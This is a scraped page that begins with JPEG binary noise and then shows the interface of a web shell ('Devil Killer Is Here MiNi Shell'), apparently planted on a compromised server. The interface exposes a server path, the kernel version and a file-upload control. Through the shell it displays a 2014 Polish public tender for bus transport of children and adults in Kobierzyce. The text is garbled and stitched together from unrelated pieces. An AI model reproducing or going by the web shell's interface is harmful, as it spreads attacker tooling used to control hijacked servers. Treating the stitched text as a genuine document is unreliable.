JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141223/418886-N-2014.html

<p class="kh_header"><b>Kobierzyce: USŁUGI PRZEWOZU OSÓB - dzieci, młodzieży i osób dorosłych</b><br>
<b>Numer ogłoszenia: 418886 - 2014; data zamieszczenia: 23.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminne Centrum Kultury i Sportu , ul. Ludowa 7, 55-040 Kobierzyce, woj. dolnośląskie, tel. 071 3111200, faks 071 3111852.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Jednostka Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI PRZEWOZU OSÓB - dzieci, młodzieży i osób dorosłych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywne świadczenie usług przewozu osób: dzieci, młodzieży i osób dorosłych środkiem transportu o wielkości odpowiedniej do ilości osób zgłoszonych w zleceniu indywidualnym. Przewóz odbywać się będzie na terenie Polski. Najwięcej kursów odbywać się będzie po terenie Dolnego Śląska. Incydentalnie mogą zdarzyć się przewozy na teren krajów Unii Europejskiej. Zwiększona częstotliwość przewozów wystąpi w okresie ferii szkolnych i wakacji. Zlecający przewiduje, iż największa ilość autobusów wykorzystywanych do równoczesnego świadczenia usługi nie przekroczy 5 sztuk. W trakcie przewozów wykonawca udostępni również luki bagażowe do przewozu bagażu pasażerów. 
Usługi muszą być świadczone sprawnymi technicznie, zarejestrowanymi środkami transportu posiadającymi ważne badanie techniczne oraz ubezpieczenie OC. Zabronione jest świadczenie usługi środkiem transportu uszkodzonym, wycofanym z ruchu, kradzionym lub wyrejestrowanym. Zabronione jest przewożenie większej niż dopuszczalna liczby osób określonej w dowodzie rejestracyjnym.
Przez cały okres trwania umowy Wykonawca powinien posiadać ważne ubezpieczenie OC z tytułu prowadzenia działalności gospodarczej oraz ubezpieczenie OC na przewóz krajowy dla używanych do świadczenia usług środków transportu. 
Zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym  (t.j 2013r. poz. 1414 z pózn. zm Wykonawca winien posiadać:
 zezwolenie na wykonywanie zawodu przewoźnika drogowego, na zasadach określonych w rozporządzeniu Parlamentu Europejskiego i Rady (WE) nr 1071/2009 z dnia 21 października 2009 r. ustanawiającym wspólne zasady dotyczące warunków wykonywania zawodu przewoźnika drogowego i uchylającym dyrektywę Rady 96/26/WE, zwanym dalej rozporządzeniem (WE) nr1071/2009)
licencję wspólnotową na podjęcie i wykonywanie międzynarodowego transportu drogowego, zasadach określonych w rozporządzeniu Parlamentu Europejskiego i Rady (WE) nr 1073/2009 z dnia 21 października 2009 r. w sprawie wspólnych zasad dostępu do międzynarodowego rynku usług autokarowych i autobusowych i zmieniającym rozporządzenie (WE) nr 561/2006, zwanym dalej rozporządzeniem (WE) nr 1073/2009 zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym  (t.j 2013r. poz. 1414 z pózn. zm).
Uwaga: Zezwolenia i licencje na wykonywanie transportu drogowego udzielone na podstawie uprzednio obowiązujących przepisów ustawy zachowują moc, w sytuacji gdy nie wygasły bądź nie zostały cofnięte.
Kierowcy zatrudnieni przez Wykonawcę do świadczenia usługi powinni posiadać uprawnienia do kierowania pojazdem zgodnie z ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (t.j. Dz. U. 2012 r. poz. 1137 z pózn. zm.).
Przewozy będą świadczone na rzecz uczestników zajęć kulturalnych i sportowych organizowanych przez Gminne Centrum Kultury i Sportu w Kobierzycach w tym między innymi wyjazdy na zajęcia oświatowe i kulturalne - do kina, muzeum, opery, na festiwale, na konkursy oraz na zajęcia sportowe w tym na rozgrywki meczy ligowych, na lodowisko, na basen. 
Wymagane jest świadczenie usługi po najkrótszej możliwej trasie. Odstępstwo od tej zasady każdorazowo winno być uzgodnione z opiekunem grupy lub zlecającym przejazd. 
Od kierowców autobusów wymagany jest profesjonalizm oraz dobra znajomość tras. Kierowcy winni się przygotować przed wyruszeniem w trasę, w tym również zaopatrzyć w aktualne mapy tradycyjne Niedopuszczalne jest kierowanie się, co do wyboru trasy, wyłącznie w oparciu o elektroniczną nawigację. 
Wymagane jest aby wejście i wyjście pasażerów do i z pojazdu odbywało się w bezpiecznych miejscach, najbliższych od wejścia do odwiedzanego obiektu, a w przypadku większych miejscowości w miejscach postojowych zlokalizowanych najbliżej miejsca przeznaczenia, w tym również na parkingach płatnych między innymi w centrach miast, przy teatrach, kinach, stadionach, boiskach, lodowiskach, halach sportowych, pałacach, zamkach muzeach itp. W trakcie wsiadania i wysiadania dzieci i młodzieży do lat 18 wymagane jest włączanie świateł awaryjnych.
W styczniu 2015 roku Wykonawca zobowiązany będzie do niezwłocznego świadczenia usług na zlecenie przekazane bez pięciodniowego wyprzedzenia o którym mowa w pkt. 3.12. Pierwsze przewozy planowane są na 19 stycznia 2015 roku
Kursy będą zamawiane z wyprzedzeniem co najmniej 5 dniowym poprzez elektroniczne zamówienie na wskazaną przez Wykonawcę w ofercie skrzynkę e- mail. Zamówienie przesłane poprzez pocztę elektroniczną wymaga niezwłocznego potwierdzenia odbioru przez Wykonawcę. Zamówienie będzie zawierało co najmniej informacje: 
numer zlecenia 
data i godzina podstawienia pojazdu,
miejsce podstawienia pojazdu,
miejsce docelowe przejazdu ze wskazaniem miejsca wejścia i opuszczenia środka transportu,
ilość uczestników przejazdu,
imię i nazwisko opiekuna,
rodzaj pojazdu z rozgraniczeniem: autobus mniejszy/autobus większy.
Zlecający każdorazowo zapewni opiekuna grupy.
Zlecający zamierza korzystać z 
Mniejszych autobusów przeznaczonych konstrukcyjnie do przewozu nie więcej niż 23 osób oraz kierowcy, zwanych dalej autobusami mniejszymi; Ilość osób będzie podawana w zleceniu przewozu. W przypadku przewożenia mniejszej ilości osób niż 23 możliwe będzie zastosowanie pojazdu o niżej dopuszczalnej liczbie przewożonych osób.   
Większych autobusów przeznaczonych konstrukcyjnie do przewozu o co najmniej 49 osób oraz kierowcy, zwanych dalej autobusami większymi. 
Środki transportu wykorzystywane do świadczenia usługi nie mogą być starsze od zaoferowanych w ofercie. Zlecający wymaga aby przewóz osób był wykonywany środkami transportu nie starszymi niż 15 lat dla autobusów większych i nie starszymi niż 8 lat dla autobusów mniejszych. Pojazdy winny być stosownie oznaczone zgodnie z art. 57 ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (t.j. Dz. U. 2012 r. poz. 1137 z pózn. zm.).
Zlecający określa maksymalny zakres usługi na:
Transport mniejszym autobusem - do 5300 km
Transport większym autobusem - do 26700 km.
Kierowca winien na każde żądanie opiekuna grupy okazać stan liczników w autobusie. 
Stawka za kilometr świadczonej usługi będzie zależna od wielkości wykorzystanego środka transportu. 
Należność za każdy kurs będzie ustalona w oparciu o iloczyn ilości przejechanych kilometrów od miejsca zbiórki lub wejścia do pojazdu pierwszych pasażerów oraz stawki za kilometr transportu właściwym, co do wielkości środkiem transportu. 
Należność będzie uregulowana za usługi faktycznie pobrane, za każdy kurs osobno. Faktury za świadczone usługi winny być szczegółowo wypełnione z dokładnym wskazaniem numeru zlecenia, nazwy wycieczki, trasy przejazdu, ilości przejechanych kilometrów, rodzaju środka transportu.
Wynagrodzenie Wykonawcy ustalone w sposób określony powyżej winno pokrywać wszelkie koszty jakie wiążą się z wykonywaniem zamówienia, w tym co najmniej opłaty za parkingi płatne, opłaty za płatne drogi oraz za kary za nieprzestrzeganie przepisów w zakresie transportu drogowego nałożone przez organy nadzorujące transport drogowy.
W przypadku wyjazdu obejmującego noclegi uczestników Zlecający zobowiązuje się do pokrycia kosztów noclegu kierowcy na warunkach jak dla pozostałych uczestników wyjazdu.
Wszystkie miejsca siedzące muszą być wyposażone w pasy bezpieczeństwa, zagłówki, regulacje oparć pod plecy pasażera oraz oparcie dla stóp.
W przypadku wystąpienia na zewnątrz temperatur powyżej 20oC przewóz osób winien odbywać się środkiem transportu posiadającym sprawną klimatyzację w przedziale pasażerskim.
W przypadku obniżenia temperatury i zimna wymagane jest ogrzewanie przedziału pasażerskiego.
W przypadku użycia autobusów większych na dłuższych trasach (powyżej 100 km w jedną stronę) pożądane jest wykonywanie usługi środkiem transportu posiadającym sprawną i czystą toaletę zaopatrzoną w niezbędne środki higieniczne. 
W przypadku użycia autobusów większych na dłuższych trasach (powyżej 100 km w jedną stronę)  wymagane jest wyświetlanie filmów na monitorach telewizyjnych, o tematyce odpowiedniej dla transportowanych osób - repertuar do uzgodnienia z organizatorem przejazdu.
W każdym pojeździe winna znajdować się w pełni wyposażona aktualna apteczka (w tym w środki dla osób z chorobą lokomocyjną) gaśnice p.poż. z aktualnym badaniem oraz młoteczki do ewentualnego rozbicia szyb umieszczone w miejscach widocznych.
Wymagane jest aby na każdym fotelu pasażerskim przed każdym kursem zawieszano nowe woreczki higieniczne. Konieczne jest też wydawanie przez kierowcę nowych woreczków w trakcie postoju w razie potrzeby.
Wymagane jest sprzątanie po każdym kursie, w razie potrzeby również podczas postoju w trakcie trasy.  
Zlecający zastrzega możliwość wezwania przed każdym przejazdem i w jego trakcie odpowiednich funkcjonariuszy celem skontrolowania stanu technicznego pojazdu oraz trzeźwości kierowcy.
W przypadkach awaryjnych Zlecający wymaga podstawienia środka transportu zastępczego niezwłocznie tj. w ciągu 45 minut na miejsce zbiórki w Kobierzycach lub w ciągu czasu niezbędnego na dojazd z GCKiS w Kobierzycach do miejsca do którego niezbędne jest dostarczenie środka zastępczego. Czas niezbędny ustalony zostanie w oparciu o czas wskazany na dojazd na  www.google.maps.pl zwiększony o jedną godzinę na zorganizowanie pojazdu zastępczego, o ile podstawienie środka zastępczego wymagane jest w trasie.
W przypadku opóźnienia zaistniałego z winy Wykonawcy, w przewozie skutkującego niemożliwością skorzystania z przedsięwzięcia, na które przewożono osoby, Wykonawca pokryje wszelkie koszty przejazdu pokrywające co najmniej koszty dojazdu oraz zakup biletów na to przedsięwzięcie.
W przypadku opóźnienia zaistniałego z winy Wykonawcy, w przewozie, na rozgrywki sportowe, uniemożliwiającego wzięcie udziału w turnieju - Wykonawca oprócz poniesienia kosztów dojazdu na rozgrywki, tytułem zadośćuczynienia dla zawodników i klubu zobowiązany będzie do zapłaty odszkodowania na rzecz Klubu Sportowego drużyny, która nie dojechała na rozgrywki w wysokości 500,00 złotych. Powyższa kara nie będzie zastosowana jeżeli staraniem Wykonawcy rozgrywki odbędą się, pomimo opóźnienia, w zaplanowanym dniu. 
Wykonawca może powierzyć wykonanie usług podwykonawcom na warunkach nie gorszych od zaproponowanych w ofercie Wykonawcy, pod warunkiem przedstawienia Zamawiającemu dokumentów wymienionych w pkt. 6.A niniejszej SIWZ. 
 Zlecający nie dopuszcza składania ofert częściowych. 
Zlecający nie dopuszcza składania ofert wariantowych.
Zlecający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust.1 pkt 6, w ilości nie przekraczającej 15 % wartości umowy podstawowej.
Zlecający zastrzega, iż w przypadku nieudzielania dotacji na działanie Zlecającego w zakresie będącym przedmiotem umowy na rok 2015 i/lub 2016 przez organizatora - Gminę Kobierzyce umowa zostanie rozwiązana z końcem właściwego roku, a Wykonawcy z tego tytułu nie przysługują żadne roszczenia odszkodowawcze bądź o zapłatę dalszego wynagrodzenia. W takim przypadku wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.17.00.00-0, 60.17.20.00-4, 60.10.00.00-9, 60.14.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 3000.00 PLN (słownie: trzy tysiące 00/100 PLN)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-zezwolenie na wykonywanie zawodu przewoźnika drogowego, na zasadach określonych w rozporządzeniu Parlamentu Europejskiego i Rady (WE) nr 1071/2009 z dnia 21 października 2009 r. ustanawiającym wspólne zasady dotyczące warunków wykonywania zawodu przewoźnika drogowego i uchylającym dyrektywę Rady 96/26/WE, zwanym dalej rozporządzeniem (WE) nr1071/2009);
-licencję wspólnotową na podjęcie i wykonywanie międzynarodowego transportu drogowego, na zasadach określonych w rozporządzeniu Parlamentu Europejskiego i Rady (WE) nr 1073/2009 z dnia 21 października 2009 r. w sprawie wspólnych zasad dostępu do międzynarodowego rynku usług autokarowych i autobusowych i zmieniającym rozporządzenie (WE) nr 561/2006, zwanym dalej rozporządzeniem (WE) nr 1073/2009 zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym  (t.j 2013r. poz. 1414 z pózn. zm);
Uwaga: w miejsce powyżej wymienionych dokumentów (6.2 i 6.3) Wykonawca może złożyć zezwolenia i licencje na wykonywanie transportu drogowego udzielone na podstawie uprzednio obowiązujących przepisów ustawy o ile zachowały moc, nie wygasły bądź nie zostały cofnięte;
-Oświadczenie, potwierdzające, że Wykonawca spełnia warunki określone w art. 22 ust 1 PZP zgodne co do treści z oświadczeniem przedstawionym w załączniku nr 2 Formularza Ofertowego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że wykonawca posiada wiedzę i doświadczenie - to jest wykonywał w okresie ostatnich trzech lat przed upływem terminu składania ofert, jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, wykonanie usług tożsamych z przedmiotem zamówienia - przewozu osób o wartości łącznej nie mniejszej niż 120 000,00 złotych - Wykonawca zobowiązany jest załączyć do oferty:
4	wykaz usług wykonanych/wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, daty i miejsca wykonania. Wymagane jest posiadanie minimalnego doświadczenia - to jest w okresie ostatnich 3 lat tj. wykonanie usług tożsamych z przedmiotem zamówienia - przewozu osób o wartości łącznej nie mniejszej niż 120 000,00 złotych. Wykaz winien być wykonany wg wzoru przedstawionego w załączniku nr 4 Formularza Ofertowego; 
5	Dowody potwierdzające bezspornie, że usługi wymienione w wykazie opisanym w pkt. 6.4 zostały wykonane lub są wykonywane należycie. Dowodami są: poświadczenia, a w przypadku, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia - oświadczenie wykonawcy. W razie konieczności, szczególnie, gdy wykaz lub dowody, budzą wątpliwości zamawiającego lub, gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz, którego usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio zamawiającemu. 6	Oświadczenie, potwierdzające, że Wykonawca spełnia warunki określone w art. 22 ust 1 PZP zgodne co do treści z oświadczeniem przedstawionym w załączniku nr 2 Formularza Ofertowego</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, ze wykonawca dysponuje odpowiednim potencjałem technicznym - Wykonawca zobowiązany jest załączyć do oferty: 
7	Wykaz urządzeń technicznych - autobusów dostępnych Wykonawcy, jakich zamierza użyć do realizacji usługi. Minimalny wymagany sprzęt obejmuje: co najmniej 3 sztuki autobusów przystosowanych do przewozu co najmniej 23 osób oraz kierowcy oraz co najmniej 5 sztuk autobusów przystosowanych do przewozu co najmniej 49 osób oraz kierowcy. Autobusy muszą być wyprodukowane po 1.01.1999 roku i posiadać cechy opisane w pkt. 3 Opisu przedmiotu zamówienia. W wykazie należy podać markę i model autobusów, nr. rejestracyjne, rok produkcji autobusu oraz liczbę osób które można w nim przewozić - zgodną z wpisaną do dowodu rejestracyjnego, wyposażenie. Wykaz należy sporządzić wg wzoru przedstawionego w załączniku nr 5 
9	Oświadczenie, potwierdzające że Wykonawca spełnia warunki określone w art. 22 ust 1 PZP zgodne co do treści z oświadczeniem przedstawionym w załączniku nr 2 Formularza Ofertowego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, ze wykonawca dysponuje osobami zdolnymi do wykonania zamówienia - Wykonawca zobowiązany jest załączyć do oferty: 
8	Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia jako kierowcy autobusów, w tym osób posiadających stosowne uprawnienia do kierowania pojazdami zgodnie z ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (t.j. Dz. U. 2012 r. poz. 1137 z pózn. zm.). W wykazie należy wskazać osoby posiadające uprzednie doświadczenie zawodowe tj. wymagane jest wykazanie się co najmniej dwu letnim doświadczeniem zawodowym w przewozie osób autobusami w rozumieniu ustawy Prawo o ruchu drogowym. Wykaz należy sporządzić wg wzoru Formularza Ofertowego w załączniku nr 3 podając dane osoby, rodzaj posiadanych uprawnień, doświadczenie zawodowe, oraz podstawę do dysponowania osobą;
9	Oświadczenie, potwierdzające że Wykonawca spełnia warunki określone w art. 22 ust 1 PZP zgodne co do treści z oświadczeniem przedstawionym w załączniku nr 2 Formularza Ofertowego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - Wykonawca zobowiązany jest załączyć do oferty:
10	Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 1.000.000,00 złotych. Z przedłożonych dokumentów winno bezspornie wynikać, iż ubezpieczenie jest opłacone poprzez jednoznaczny zapis na polisie lub dowód opłacenia przelewem lub do kasy.
11	Oświadczenie, potwierdzające, że Wykonawca spełnia warunki określone w art. 22 ust 1 PZP zgodne co do treści z oświadczeniem przedstawionym w załączniku nr 2 Formularza Ofertowego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

